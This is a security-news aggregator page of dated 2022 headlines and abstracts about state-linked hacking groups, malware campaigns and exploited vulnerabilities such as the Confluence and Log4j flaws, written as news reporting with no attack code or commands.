A now-patched critical security flaw affecting Atlassian Confluence Server that came to light a few months ago is being actively exploited for illicit cryptocurrency mining on unpatched installations. "If left unremedied and successfully exploited, this vulnerability could be used for multiple and more malicious attacks, such as a complete domain takeover of the infrastructure and the deployment of information stealers, remote access trojans (RATs), and ransomware," Trend Micro threat researcher Sunil Bharti said in a report. The issue, tracked as CVE-2022-26134 (CVSS score: 9.8), was addressed by the Australian software company in June 2022. In one of the infection chains observed by the cybersecurity company, the flaw was leveraged to download and run a shell script ("ro.sh") on the victim's machine, which, in turn, fetched a second shell script ("ap.sh"). The malicious code is designed to update the PATH variable to include additional pathsThe Hacker News
September 21, 2022
Pro-Ukraine Hacktivists Claim to Have Hacked Notorious Russian Mercenary Group Full Text
Abstract
The hackers did not post any data that would help verify their claims. Motherboard could not independently verify whether the hacktivists stole the personal data of Wagner mercenaries.Vice
September 20, 2022
Russian Sandworm Hackers Impersonate Ukrainian Telecoms to Distribute Malware Full Text
Abstract
A threat cluster linked to the Russian nation-state actor tracked as Sandworm has continued its targeting of Ukraine with commodity malware by masquerading as telecom providers, new findings show. Recorded Future said it discovered new infrastructure belonging to UAC-0113 that mimics operators like Datagroup and EuroTransTelecom to deliver payloads such as Colibri loader and Warzone RAT . The attacks are said to be an expansion of the same campaign that previously distributed DCRat (or DarkCrystal RAT) using phishing emails with legal aid-themed lures against providers of telecommunications in Ukraine. Sandworm is a destructive Russian threat group that's best known for carrying out attacks such as the 2015 and 2016 attacks on the Ukrainian electrical grid and the 2017 NotPetya attacks. It's confirmed to be Unit 74455 of Russia's GRU military intelligence agency. The adversarial collective, also known as Voodoo Bear, sought to damage high-voltage electrical sThe Hacker News
September 19, 2022
Russian Sandworm hackers pose as Ukrainian telcos to drop malware Full Text
Abstract
The Russian state-sponsored hacking group known as Sandworm has been observed masquerading as telecommunication providers to target Ukrainian entities with malware.BleepingComputer
September 16, 2022
Opsec Mistakes Reveal COBALT MIRAGE Threat Actors Full Text
Abstract
Despite Secureworks CTU researchers publicly disclosing COBALT MIRAGE tactics, techniques, and procedures (TTPs) in May 2022, the threat actors continue to demonstrate many of the same behaviors.Secure Works
September 16, 2022
North Korean Hackers Spreading Trojanized Versions of PuTTY Client Application Full Text
Abstract
A threat actor with a North Korea nexus has been found leveraging a "novel spear phish methodology" that involves making use of trojanized versions of the PuTTY SSH and Telnet client. Google-owned threat intelligence firm Mandiant attributed the new campaign to an emerging threat cluster it tracks under the name UNC4034 . "UNC4034 established communication with the victim over WhatsApp and lured them to download a malicious ISO package regarding a fake job offering that led to the deployment of the AIRDRY.V2 backdoor through a trojanized instance of the PuTTY utility," Mandiant researchers said . The utilization of fabricated job lures as a pathway for malware distribution is an oft-used tactic by North Korean state-sponsored actors, including the Lazarus Group, as part of an enduring campaign called Operation Dream Job . The entry point of the attack is an ISO file that masquerades as an Amazon Assessment as part of a potential job opportunity at the tech giant.The Hacker News
September 15, 2022
Russian Gamaredon Hackers Target Ukrainian Government Using Info-Stealing Malware Full Text
Abstract
An ongoing espionage campaign operated by the Russia-linked Gamaredon group is targeting employees of Ukrainian government, defense, and law enforcement agencies with a piece of custom-made information stealing malware. "The adversary is using phishing documents containing lures related to the Russian invasion of Ukraine," Cisco Talos researchers Asheer Malhotra and Guilherme Venere said in a technical write-up shared with The Hacker News. "LNK files, PowerShell, and VBScript enable initial access, while malicious binaries are deployed in the post-infection phase." Active since 2013, Gamaredon – also known as Actinium, Armageddon, Primitive Bear, Shuckworm, and Trident Ursa – has been linked to numerous attacks aimed at Ukrainian entities in the aftermath of Russia's military invasion of Ukraine in late February 2022. The targeted phishing operation, observed as recently as August 2022, also follows similar intrusions uncovered by Symantec last month inThe Hacker News
September 15, 2022
Webworm Hackers Using Modified RATs in Latest Cyber Espionage Attacks Full Text
Abstract
A threat actor tracked under the moniker Webworm has been linked to bespoke Windows-based remote access trojans, some of which are said to be in pre-deployment or testing phases. "The group has developed customized versions of three older remote access trojans (RATs), including Trochilus RAT , Gh0st RAT , and 9002 RAT ," the Symantec Threat Hunter team, part of Broadcom Software, said in a report shared with The Hacker News. The cybersecurity firm said at least one of the indicators of compromise (IOCs) was used in an attack against an IT service provider operating in multiple Asian countries. It's worth pointing out that all three backdoors are primarily associated with Chinese threat actors such as Stone Panda (APT10), Aurora Panda (APT17), Emissary Panda (APT27), and Judgement Panda (APT31), among others, although they have been put to use by other hacking groups. Symantec said the Webworm threat actor exhibits tactical overlaps with another new adversaThe Hacker News
September 13, 2022
Chinese government hackers using diverse toolset to target Asian prime ministers, telecoms Full Text
Abstract
Hackers associated with the Chinese military are leveraging a wide range of legitimate software packages in order to load their malware payloads and target government leaders across Asia, according to the Symantec Threat Hunter team.The Record
September 13, 2022
Iranian Hackers Target High-Value Targets in Nuclear Security and Genomic Research Full Text
Abstract
Hackers tied to the Iranian government have been targeting individuals specializing in Middle Eastern affairs, nuclear security, and genome research as part of a new social engineering campaign designed to hunt for sensitive information. Enterprise security firm Proofpoint attributed the targeted attacks to a threat actor named TA453, which broadly overlaps with cyber activities monitored under the monikers APT42, Charming Kitten, and Phosphorus. It all starts with a phishing email impersonating legitimate individuals at Western foreign policy research organizations that's ultimately designed to gather intelligence on behalf of Iran's Islamic Revolutionary Guard Corps (IRGC). Spoofed personas include people from Pew Research Center, the Foreign Policy Research Institute (FPRI), the U.K.'s Chatham House, and the scientific journal Nature. The technique is said to have been deployed in mid-June 2022. What's different from other phishing attacks is the use of a tactThe Hacker News
September 13, 2022
New PsExec spinoff lets hackers bypass network security defenses Full Text
Abstract
Security researchers have developed an implementation of the Sysinternals PsExec utility that allows moving laterally in a network using a less monitored port.BleepingComputer
September 11, 2022
North Korea’s Lazarus hackers are exploiting Log4j flaw to hack US energy companies Full Text
Abstract
Security researchers have linked a new cyber espionage campaign targeting U.S., Canadian and Japanese energy providers to the North Korean state-sponsored Lazarus hacking group.Tech Crunch
September 09, 2022
Hackers Exploit Zero-Day in WordPress BackupBuddy Plugin in ~5 Million Attempts Full Text
Abstract
A zero-day flaw in a WordPress plugin called BackupBuddy is being actively exploited, WordPress security company Wordfence has disclosed. "This vulnerability makes it possible for unauthenticated users to download arbitrary files from the affected site which can include sensitive information," it said. BackupBuddy allows users to back up their entire WordPress installation from within the dashboard, including theme files, pages, posts, widgets, users, and media files, among others. The plugin is estimated to have around 140,000 active installations, with the flaw (CVE-2022-31474, CVSS score: 7.5) affecting versions 8.5.8.0 to 8.7.4.1. It's been addressed in version 8.7.5 released on September 2, 2022. The issue is rooted in the function called "Local Directory Copy" that's designed to store a local copy of the backups. According to Wordfence, the vulnerability is the result of an insecure implementation, which enables an unauthenticated threat actThe Hacker News
September 9, 2022
Iran-linked DEV-0270 group abuses BitLocker to encrypt victims’ devices Full Text
Abstract
Iran-linked APT group DEV-0270 (aka Nemesis Kitten) is abusing the BitLocker Windows feature to encrypt victims' devices. Microsoft Security Threat Intelligence researchers reported that Iran-linked APT group DEV-0270 (Nemesis Kitten) has been abusing...Security Affairs
September 08, 2022
North Korean Lazarus Hackers Targeting Energy Providers Around the World Full Text
Abstract
A malicious campaign mounted by the North Korea-linked Lazarus Group targeted energy providers around the world, including those based in the United States, Canada, and Japan, between February and July 2022. "The campaign is meant to infiltrate organizations around the world for establishing long-term access and subsequently exfiltrating data of interest to the adversary's nation-state," Cisco Talos said in a report shared with The Hacker News. Some elements of the espionage attacks have already entered the public domain, courtesy of prior reports from Broadcom-owned Symantec and AhnLab earlier this April and May. Symantec attributed the operation to a group referred to as Stonefly, a Lazarus subgroup which is better known as Andariel, Guardian of Peace, Operation Troy, and Silent Chollima. While these attacks previously led to the instrumentation of Preft (aka Dtrack) and NukeSped (aka Manuscrypt) implants, the latest attack wave is notable for employing two other pieces of malThe Hacker News
September 08, 2022
Microsoft: Iranian hackers encrypt Windows systems using BitLocker Full Text
Abstract
Microsoft says an Iranian state-sponsored threat group it tracks as DEV-0270 (aka Nemesis Kitten) has been abusing the BitLocker Windows feature in attacks to encrypt victims' systems.BleepingComputer
September 08, 2022
North Korean Lazarus hackers take aim at U.S. energy providers Full Text
Abstract
The North Korean APT group 'Lazarus' (APT38) is exploiting VMWare Horizon servers to access the corporate networks of energy providers in the United States, Canada, and Japan.BleepingComputer
September 07, 2022
North Korean Hackers Deploying New MagicRAT Malware in Targeted Campaigns Full Text
Abstract
The prolific North Korean nation-state actor known as the Lazarus Group has been linked to a new remote access trojan called MagicRAT. The previously unknown piece of malware is said to have been deployed in victim networks that had been initially breached via successful exploitation of internet-facing VMware Horizon servers, Cisco Talos said in a report shared with The Hacker News. "While being a relatively simple RAT capability-wise, it was built with recourse to the Qt Framework, with the sole intent of making human analysis harder, and automated detection through machine learning and heuristics less likely," Talos researchers Jung soo An, Asheer Malhotra, and Vitor Ventura said. Lazarus Group, also known as APT38, Dark Seoul, Hidden Cobra, and Zinc, refers to a cluster of financially motivated and espionage-driven cyber activities undertaken by the North Korean government as a means to sidestep sanctions imposed on the country and meet its strategic objectivesThe Hacker News
September 06, 2022
Worok Hackers Target High-Profile Asian Companies and Governments Full Text
Abstract
High-profile companies and local governments located primarily in Asia are the subjects of targeted attacks by a previously undocumented espionage group dubbed Worok that has been active since late 2020. "Worok's toolset includes a C++ loader CLRLoad, a PowerShell backdoor PowHeartBeat, and a C# loader PNGLoad that uses steganography to extract hidden malicious payloads from PNG files," ESET researcher Thibaut Passilly said in a new report published today. Worok is said to share overlaps in tools and interests with another adversarial collective tracked as TA428, with the group linked to attacks against entities spanning energy, financial, maritime, and telecom sectors in Asia as well as a government agency in the Middle East and a private firm in southern Africa. Malicious activities undertaken by the group experienced a noticeable break from May 2021 to January 2022, before resuming the next month. The Slovak cybersecurity firm assessed the group's goalsThe Hacker News
September 06, 2022
TA505 Hackers Using TeslaGun Panel to Manage ServHelper Backdoor Attacks Full Text
Abstract
Cybersecurity researchers have offered fresh insight into a previously undocumented software control panel used by a financially motivated threat group known as TA505. "The group frequently changes its malware attack strategies in response to global cybercrime trends," Swiss cybersecurity firm PRODAFT said in a report shared with The Hacker News. "It opportunistically adopts new technologies in order to gain leverage over victims before the wider cybersecurity industry catches on." Also tracked under the names Evil Corp, Gold Drake, Dudear, Indrik Spider, and SectorJ04, TA505 is an aggressive Russian cybercrime syndicate behind the infamous Dridex banking trojan and has been linked to a number of ransomware campaigns in recent years. It's also said to be connected to the Raspberry Robin attacks that emerged in September 2021, with similarities uncovered between the malware and Dridex. Other notable malware families associated with the groupThe Hacker News
September 6, 2022
Experts discovered TeslaGun Panel used by TA505 to manage its ServHelper Backdoor Full Text
Abstract
Researchers discovered a previously undocumented software control panel, named TeslaGun, used by a cybercrime gang known as TA505. Researchers from cybersecurity firm PRODAFT have discovered a previously undocumented software control panel, tracked...Security Affairs
September 06, 2022
New Worok cyber-espionage group targets governments, high-profile firms Full Text
Abstract
A newly discovered cyber-espionage group has been hacking governments and high-profile companies in Asia since at least 2020 using a combination of custom and existing malicious tools.BleepingComputer
September 2, 2022
Traffers threat: The invisible thieves Full Text
Abstract
Traffers — from the Russian word “траффер,” also referred to as “worker” — are cybercriminals responsible for redirecting Internet users' network traffic to malicious content that they operate, this content being malware most of the time.Tech Republic
August 31, 2022
Microsoft Excel attacks fall out of fashion with hackers Full Text
Abstract
Security vendor Hornetsecurity said its researchers logged a significant drop over July in the volume of malware-laden emails that relied on malicious Microsoft Excel documents.Tech Target
August 30, 2022
Hackers Use ModernLoader to Infect Systems with Stealers and Cryptominers Full Text
Abstract
As many as three disparate but related campaigns between March and June 2022 have been found to deliver a variety of malware, including ModernLoader, RedLine Stealer, and cryptocurrency miners onto compromised systems. "The actors use PowerShell, .NET assemblies, and HTA and VBS files to spread across a targeted network, eventually dropping other pieces of malware, such as the SystemBC trojan and DCRat, to enable various stages of their operations," Cisco Talos researcher Vanja Svajcer said in a report shared with The Hacker News. The malicious implant in question, ModernLoader, is designed to provide attackers with remote control over the victim's machine, which enables the adversaries to deploy additional malware, steal sensitive information, or even ensnare the computer in a botnet. Cisco Talos attributed the infections to a previously undocumented but Russian-speaking threat actor, citing the use of off-the-shelf tools. Potential targets included Eastern EurThe Hacker News
August 30, 2022
Chinese hackers target Australian govt with ScanBox malware Full Text
Abstract
China-based threat actors have been targeting Australian government agencies and wind turbine fleets in the South China Sea by directing select individuals to a fake website impersonating an Australian news media outlet.BleepingComputer
August 27, 2022
Iranian Hackers Exploiting Unpatched Log4j 2 Bugs to Target Israeli Organizations Full Text
Abstract
Iranian state-sponsored actors are leaving no stone unturned to exploit unpatched systems running Log4j to target Israeli entities, indicating the vulnerability's long tail for remediation. Microsoft attributed the latest set of activities to the umbrella threat group tracked as MuddyWater (aka Cobalt Ulster, Mercury, Seedworm, or Static Kitten), which is linked to the Iranian intelligence apparatus, the Ministry of Intelligence and Security (MOIS). The attacks are notable for using SysAid Server instances unsecured against the Log4Shell flaw as a vector for initial access, marking a departure from the actors' pattern of leveraging VMware applications for breaching target environments. "After gaining access, Mercury establishes persistence, dumps credentials, and moves laterally within the targeted organization using both custom and well-known hacking tools, as well as built-in operating system tools for its hands-on-keyboard attack," Microsoft said. The tech giaThe Hacker News
August 27, 2022
Threat actor abuses Genshin Impact Anti-Cheat driver to disable antivirus Full Text
Abstract
Threat actors abused a vulnerable anti-cheat driver for the Genshin Impact video game to disable antivirus software. Threat actors abused a vulnerable anti-cheat driver, named mhyprot2.sys, for the Genshin Impact video game to disable antivirus software....Security Affairs
August 26, 2022
Microsoft: Iranian attackers are using Log4Shell to target organizations in Israel Full Text
Abstract
While the threat appears to be targeted exclusively at organizations based in Israel, Microsoft is urging all organizations to check whether SysAid is present on the network and apply the firm's patches for the Log4j flaws.ZDNet
August 25, 2022
How ‘Kimsuky’ hackers ensure their malware only reach valid targets Full Text
Abstract
The North Korean 'Kimsuky' threat actors are going to great lengths to ensure that their malicious payloads are only downloaded by valid targets and not on the systems of security researchers.BleepingComputer
August 25, 2022
Okta Hackers Behind Twilio and Cloudflare Breach Hit Over 130 Organizations Full Text
Abstract
The threat actor behind the attacks on Twilio and Cloudflare earlier this month has been linked to a broader phishing campaign aimed at 136 organizations that resulted in a cumulative compromise of 9,931 accounts. The activity has been codenamed 0ktapus by Group-IB because the initial goal of the attacks was to "obtain Okta identity credentials and two-factor authentication (2FA) codes from users of the targeted organizations." Calling the attacks well designed and executed, the Singapore-headquartered company said the adversary singled out employees of companies that are customers of identity services provider Okta. The modus operandi involved sending targets text messages containing links to phishing sites that impersonated the Okta authentication page of the respective targeted entities. "This case is of interest because despite using low-skill methods it was able to compromise a large number of well-known organizations," Group-IB said. "FurtheThe Hacker News
August 25, 2022
Hackers abuse Genshin Impact anti-cheat system to disable antivirus Full Text
Abstract
Hackers are abusing an anti-cheat system driver for the immensely popular Genshin Impact game to disable antivirus software while conducting ransomware attacks.BleepingComputer
August 25, 2022
Threat actors are using the Tox P2P messenger as C2 server Full Text
Abstract
Threat actors are using the Tox peer-to-peer instant messaging service as a command-and-control server, Uptycs researchers reported. Tox is a peer-to-peer serverless instant messaging service that uses NaCl for encryption and decryption. Uptycs...Security Affairs
August 25, 2022
Hackers adopt Sliver toolkit as a Cobalt Strike alternative Full Text
Abstract
Threat actors are dumping the Cobalt Strike penetration testing suite in favor of similar frameworks that are less known. After Brute Ratel, the open-source, cross-platform kit called Sliver is becoming an attractive alternative.BleepingComputer
August 23, 2022
Google Uncovers Tool Used by Iranian Hackers to Steal Data from Email Accounts Full Text
Abstract
The Iranian government-backed actor known as Charming Kitten has added a new tool to its malware arsenal that allows it to retrieve user data from Gmail, Yahoo!, and Microsoft Outlook accounts. Dubbed HYPERSCRAPE by Google Threat Analysis Group (TAG), the actively in-development malicious software is said to have been used against fewer than two dozen accounts in Iran, with the oldest known sample dating back to 2020. The tool was first discovered in December 2021. Charming Kitten, a prolific advanced persistent threat (APT), is believed to be associated with Iran's Islamic Revolutionary Guard Corps (IRGC) and has a history of conducting espionage aligned with the interests of the government. Tracked as APT35, Cobalt Illusion, ITG18, Phosphorus, TA453, and Yellow Garuda, elements of the group have also carried out ransomware attacks, suggesting that the threat actor's motives are both espionage and financially driven. "HYPERSCRAPE requires the victim's accountThe Hacker News
August 23, 2022
Iranian UNC3890 Targets Israel’s Key Sectors Full Text
Abstract
An Iranian threat group, UNC3890, was found targeting Israeli shipping, government, healthcare, aviation, and energy sectors via watering hole attacks and credential harvesting attacks. Additionally, the researchers have discovered a UNC3890 server loaded with scraped Facebook and Instagram informati ...Cyware Alerts - Hacker News
August 23, 2022
Suspected Iranian Hackers Targeted Several Israeli Organizations for Espionage Full Text
Abstract
A suspected Iranian threat activity cluster has been linked to attacks aimed at Israeli shipping, government, energy, and healthcare organizations as part of an espionage-focused campaign that commenced in late 2020. Cybersecurity firm Mandiant is tracking the group under its uncategorized moniker UNC3890, which is believed to conduct operations that align with Iranian interests. "The collected data may be leveraged to support various activities, from hack-and-leak, to enabling kinetic warfare attacks like those that have plagued the shipping industry in recent years," the company's Israel Research Team noted. Intrusions mounted by the group lead to the deployment of two proprietary pieces of malware: a "small but efficient" backdoor named SUGARUSH and a browser credential stealer called SUGARDUMP that exfiltrates password information to an email address associated with Gmail, ProtonMail, Yahoo, and Yandex. Also employed is a network of command-and-conThe Hacker News
August 21, 2022
Hackers target hotel and travel companies with fake reservations Full Text
Abstract
A hacker tracked as TA558 has upped their activity this year, running phishing campaigns that target multiple hotels and firms in the hospitality and travel space.BleepingComputer
August 21, 2022
White hat hackers broadcasted talks and hacker movies through a decommissioned satellite Full Text
Abstract
Hackers took control of a decommissioned satellite and broadcast hacking conference talks and hacker movies. During the latest edition of the DEF CON hacking conference held in Las Vegas, the group of white hat hackers Shadytel demonstrated how to take...Security Affairs
August 20, 2022
North Korean hacker group Lazarus targeting Mac users with fake job ads Full Text
Abstract
The malware in the messages uses three files to compromise computers — a decoy PDF to make users think they've downloaded a legitimate attachment, a fake "font updater" app, and a downloader labeled "safarifontagent".Independent
August 19, 2022
DoNot Team Hackers Updated its Malware Toolkit with Improved Capabilities Full Text
Abstract
The Donot Team threat actor has updated its Jaca Windows malware toolkit with improved capabilities, including a revamped stealer module designed to plunder information from Google Chrome and Mozilla Firefox browsers. The improvements also include a new infection chain that incorporates previously undocumented components to the modular framework, Morphisec researchers Hido Cohen and Arnold Osipov disclosed in a report published last week. Also known as APT-C-35 and Viceroy Tiger, the Donot Team is known for setting its sights on defense, diplomatic, government, and military entities in India, Pakistan, Sri Lanka, and Bangladesh, among others at least since 2016. Evidence unearthed by Amnesty International in October 2021 connected the group's attack infrastructure to an Indian cybersecurity company called Innefu Labs. Spear-phishing campaigns containing malicious Microsoft Office documents are the preferred delivery pathway for malware, followed by taking advantage of mThe Hacker News
August 18, 2022
Hackers Using Bumblebee Loader to Compromise Active Directory Services Full Text
Abstract
The malware loader known as Bumblebee is being increasingly co-opted by threat actors associated with BazarLoader, TrickBot, and IcedID in their campaigns to breach target networks for post-exploitation activities. "Bumblebee operators conduct intensive reconnaissance activities and redirect the output of executed commands to files for exfiltration," Cybereason researchers Meroujan Antonyan and Alon Laufer said in a technical write-up. Bumblebee first came to light in March 2022 when Google's Threat Analysis Group (TAG) unmasked the activities of an initial access broker dubbed Exotic Lily with ties to the TrickBot and the larger Conti collectives. Typically delivered via initial access acquired through spear-phishing campaigns, the modus operandi has since been tweaked by eschewing macro-laced documents in favor of ISO and LNK files, primarily in response to Microsoft's decision to block macros by default . "Distribution of the malware is doneThe Hacker News
August 17, 2022
Researchers Link Multi-Year Mass Credential Theft Campaign to Chinese Hackers Full Text
Abstract
A Chinese state-sponsored threat activity group named RedAlpha has been attributed to a multi-year mass credential theft campaign aimed at global humanitarian, think tank, and government organizations. "In this activity, RedAlpha very likely sought to gain access to email accounts and other online communications of targeted individuals and organizations," Recorded Future disclosed in a new report. A lesser-known threat actor, RedAlpha was first documented by Citizen Lab in January 2018 and has a history of conducting cyber espionage and surveillance operations directed against the Tibetan community, some in India, to facilitate intelligence collection through the deployment of the NjRAT backdoor. "The campaigns [...] combine light reconnaissance, selective targeting, and diverse malicious tooling," Recorded Future noted at the time. Since then, malicious activities undertaken by the group have involved weaponizing as many as 350 domains that spoof legThe Hacker News
August 16, 2022
North Korea Hackers Spotted Targeting Job Seekers with macOS Malware Full Text
Abstract
The North Korea-backed Lazarus Group has been observed targeting job seekers with malware capable of executing on Apple Macs with Intel and M1 chipsets. Slovak cybersecurity firm ESET linked it to a campaign dubbed "Operation In(ter)ception" that was first disclosed in June 2020 and involved using social engineering tactics to trick employees working in the aerospace and military sectors into opening decoy job offer documents. The latest attack is no different in that a job description for the Coinbase cryptocurrency exchange platform was used as a launchpad to drop a signed Mach-O executable. ESET's analysis comes from a sample of the binary that was uploaded to VirusTotal from Brazil on August 11, 2022. "Malware is compiled for both Intel and Apple Silicon," the company said in a series of tweets. "It drops three files: a decoy PDF document 'Coinbase_online_careers_2022_07.pdf', a bundle 'FinderFontsUpdater.app,' and a downloaThe Hacker News
August 16, 2022
Chinese Cyberspies Use Supply Chain Attack to Deliver Windows, macOS Malware Full Text
Abstract
China-backed Iron Tiger APT compromised the servers of MiMi, an instant messaging application available on Windows, macOS, Android, and iOS, for a supply chain attack.Security Week
August 15, 2022
Microsoft disrupts Russian hackers’ operation on NATO targets Full Text
Abstract
The Microsoft Threat Intelligence Center (MSTIC) has disrupted a hacking and social engineering operation linked to a Russian threat actor tracked as SEABORGIUM that targets people and organizations in NATO countries.BleepingComputer
August 15, 2022
Russia-linked Shuckworm Hacker Group Maintains Focus on Ukraine Full Text
Abstract
Shuckworm (aka Gamaredon, Armageddon) is a Russia-linked group that has almost exclusively focused its operations on Ukraine since it first appeared in 2014. It is generally considered to be a state-sponsored espionage operation.Symantec
August 13, 2022
Chinese Hackers Backdoored MiMi Chat App to Target Windows, Linux, macOS Users Full Text
Abstract
A pair of reports from cybersecurity firms SEKOIA and Trend Micro sheds light on a new campaign undertaken by a Chinese threat actor named Lucky Mouse that involves leveraging a trojanized version of a cross-platform messaging app to backdoor systems. Infection chains leverage a chat application called MiMi, with its installer files compromised to download and install HyperBro samples for the Windows operating system and rshell artifacts for Linux and macOS. As many as 13 different entities located in Taiwan and the Philippines have been at the receiving end of the attacks, eight of whom have been hit with rshell. The first victim of rshell was reported in mid-July 2021. Lucky Mouse, also called APT27, Bronze Union, Emissary Panda, and Iron Tiger, is known to be active since 2013 and has a history of gaining access to targeted networks in pursuit of its political and military intelligence-collection objectives aligned with China. The advanced persistent threat actor (APT)The Hacker News
August 11, 2022
Inside the Hackers’ Toolkit – Podcast Full Text
Abstract
This edition of the Threatpost podcast is sponsored by Egress.Threatpost
August 11, 2022
The Hacking of Starlink Terminals Has Begun Full Text
Abstract
To access the satellite dish’s software, security researcher Lennert Wouters physically stripped down a dish he purchased and created a custom hacking tool that can be attached to the Starlink dish.Wired
August 10, 2022
The Business of Hackers-for-Hire Threat Actors Full Text
Abstract
Today's web has made hackers' tasks remarkably easy. For the most part, hackers don't even have to hide in the dark recesses of the web to take advantage of people any longer; they can be found right in plain sight on social media sites or forums, professionally advertised with their websites, and may even approach you anonymously through such channels as Twitter. Cybercrime has entered a new era where people don't steal just for the thrill of doing it anymore. They make it their business to carry out illegal cyber activities in small groups or individually to earn business from online criminals, selling offensive services like spyware as a service or commercial cybersecurity. For instance, a series of new DDoS-for-hire services are commoditizing the art of hacking and reducing the barrier to launching DDoS attacks. Who are Hackers-for-Hire? Hackers-for-hire are secret cyber experts or groups who specialize in infiltrating organizations to acquire intelligence in one wayThe Hacker News
August 10, 2022
Hackers behind Twilio data breach also targeted Cloudflare employees Full Text
Abstract
Cloudflare revealed that at least 76 employees and their family members were targeted by smishing attacks similar to the one that hit Twilio. The content delivery network and DDoS mitigation company Cloudflare revealed this week that at least 76 employees...Security Affairs
August 09, 2022
Chinese Hackers Targeted Dozens of Industrial Enterprises and Public Institutions Full Text
Abstract
Over a dozen military-industrial complex enterprises and public institutions in Afghanistan and Europe have come under a wave of targeted attacks since January 2022 to steal confidential data by simultaneously making use of six different backdoors. Russian cybersecurity firm Kaspersky attributed the attacks "with a high degree of confidence" to a China-linked threat actor tracked by Proofpoint as TA428, citing overlaps in tactics, techniques, and procedures (TTPs). TA428, also tracked under the names Bronze Dudley, Temp.Hex, and Vicious Panda, has a history of striking entities in Ukraine, Russia, Belarus, and Mongolia. It's believed to share connections with another hacking group called Mustang Panda (aka Bronze President). Targets of the latest cyber espionage campaign included industrial plants, design bureaus and research institutes, government agencies, ministries and departments in several East European countries and Afghanistan. Attack chains entailThe Hacker News
August 08, 2022
Chinese hackers use new Windows malware to backdoor govt, defense orgs Full Text
Abstract
An extensive series of attacks detected in January used new Windows malware to backdoor government entities and organizations in the defense industry from several countries in Eastern Europe.BleepingComputer
August 8, 2022
Hackers target social media accounts of small businesses via Instagram scams Full Text
Abstract
The phishing emails are often sent during the early evening and on weekends when the recipients are likely to be less vigilant. Such emails often claim that a business page had violated copyright laws.The Age
August 5, 2022
Mysterious threat actor TAC-040 used previously undetected Ljl Backdoor Full Text
Abstract
A threat actor, tracked as TAC-040, exploited Atlassian Confluence flaw CVE-2022-26134 to deploy previously undetected Ljl Backdoor. Cybersecurity firm Deepwatch reported that a threat actor, tracked as TAC-040, has likely exploited the CVE-2022-26134...Security Affairs
August 04, 2022
Thousands of hackers flock to ‘Dark Utilities’ C2-as-a-Service Full Text
Abstract
Security researchers found a new service called Dark Utilities that provides an easy and inexpensive way for cybercriminals to set up a command and control (C2) center for their malicious operations.BleepingComputer
August 02, 2022
Chinese hackers use new Cobalt Strike-like attack framework Full Text
Abstract
Researchers have observed a new post-exploitation attack framework used in the wild, named Manjusaka, which can be deployed as an alternative to the widely abused Cobalt Strike toolset or parallel to it for redundancy.BleepingComputer
August 02, 2022
Chinese Hackers Using New Manjusaka Hacking Framework Similar to Cobalt Strike Full Text
Abstract
Researchers have disclosed a new offensive framework called Manjusaka that they call a "Chinese sibling of Sliver and Cobalt Strike." "A fully functional version of the command-and-control (C2), written in GoLang with a User Interface in Simplified Chinese, is freely available and can generate new implants with custom configurations with ease, increasing the likelihood of wider adoption of this framework by malicious actors," Cisco Talos said in a new report. Sliver and Cobalt Strike are legitimate adversary emulation frameworks that have been used by threat actors to carry out post-exploitation activities such as network reconnaissance, lateral movement, and facilitating the deployment of follow-on payloads. Written in Rust, Manjusaka -- meaning "cow flower" -- is advertised as an equivalent to the Cobalt Strike framework with capabilities to target both Windows and Linux operating systems. Its developer is believed to be located in the GuangDongThe Hacker News
July 30, 2022
Microsoft Links Raspberry Robin USB Worm to Russian Evil Corp Hackers Full Text
Abstract
Microsoft on Friday disclosed a potential connection between the Raspberry Robin USB-based worm and an infamous Russian cybercrime group tracked as Evil Corp. The tech giant said it observed the FakeUpdates (aka SocGholish) malware being delivered via existing Raspberry Robin infections on July 26, 2022. Raspberry Robin, also called QNAP Worm, is known to spread from a compromised system via infected USB devices containing a malicious .LNK file to other devices in the target network. The campaign, which was first spotted by Red Canary in September 2021, has been elusive in that no later-stage activity has been documented nor has there been any concrete link tying it to a known threat actor or group. The disclosure, therefore, marks the first evidence of post-exploitation actions carried out by the threat actor upon leveraging the malware to gain initial access to a Windows machine. "The DEV-0206-associated FakeUpdates activity on affected systems has since led to follow-oThe Hacker News
July 29, 2022
North Korean Hackers Using Malicious Browser Extension to Spy on Email Accounts Full Text
Abstract
A threat actor operating with interests aligned with North Korea has been deploying a malicious extension on Chromium-based web browsers that's capable of stealing email content from Gmail and AOL. Cybersecurity firm Volexity attributed the malware to an activity cluster it calls SharpTongue, which is said to share overlaps with an adversarial collective publicly referred to under the name Kimsuky. SharpTongue has a history of singling out individuals working for organizations in the U.S., Europe, and South Korea who "work on topics involving North Korea, nuclear issues, weapons systems, and other matters of strategic interest to North Korea," researchers Paul Rascagneres and Thomas Lancaster said. Kimsuky's use of rogue extensions in attacks is not new. In 2018, the actor was seen utilizing a Chrome plugin as part of a campaign called Stolen Pencil to infect victims and steal browser cookies and passwords. But the latest espionage effort is different... (The Hacker News)
July 28, 2022
Hackers Opting New Attack Methods After Microsoft Blocked Macros by Default Full Text
Abstract
With Microsoft taking steps to block Excel 4.0 (XLM or XL4) and Visual Basic for Applications (VBA) macros by default across Office apps, malicious actors are responding by refining their tactics, techniques, and procedures (TTPs). "The use of VBA and XL4 Macros decreased approximately 66% from October 2021 through June 2022," Proofpoint said in a report shared with The Hacker News. Adversaries are instead pivoting away from macro-enabled documents to alternatives, including container files such as ISO and RAR as well as Windows Shortcut (LNK) files, in campaigns to distribute malware. "Threat actors pivoting away from directly distributing macro-based attachments in email represents a significant shift in the threat landscape," Sherrod DeGrippo, vice president of threat research and detection at Proofpoint, said in a statement. "Threat actors are now adopting new tactics to deliver malware, and the increased use of files suc... (The Hacker News)
July 28, 2022
Threat actors use new attack techniques after Microsoft blocked macros by default Full Text
Abstract
Threat actors are devising new attack tactics in response to Microsoft's decision to block macros by default. In response to Microsoft's decision to block Excel 4.0 (XLM or XL4) and Visual Basic for Applications (VBA) macros by default in Microsoft... (Security Affairs)
July 27, 2022
DUCKTAIL operation targets Facebook’s Business and Ad accounts Full Text
Abstract
Researchers uncovered an ongoing operation, codenamed DUCKTAIL, that targets Facebook Business and Ad accounts. Researchers from WithSecure (formerly F-Secure Business) have discovered an ongoing operation, named DUCKTAIL, that targets individuals... (Security Affairs)
July 26, 2022
AIG Threat Group Emerges With Unique Business Model Full Text
Abstract
A threat group calling itself the Atlas Intelligence Group, or AIG, was spotted offering cybercriminals a broad range of services such as leaked databases, DDoS services, hacking scripts, and more. AIG's approach and operational efficiency make them hard to detect and a constant source of threat... (Cyware Alerts - Hacker News)
July 25, 2022
Hackers Deceive Developers by Spoofing GitHub Commit Metadata Full Text
Abstract
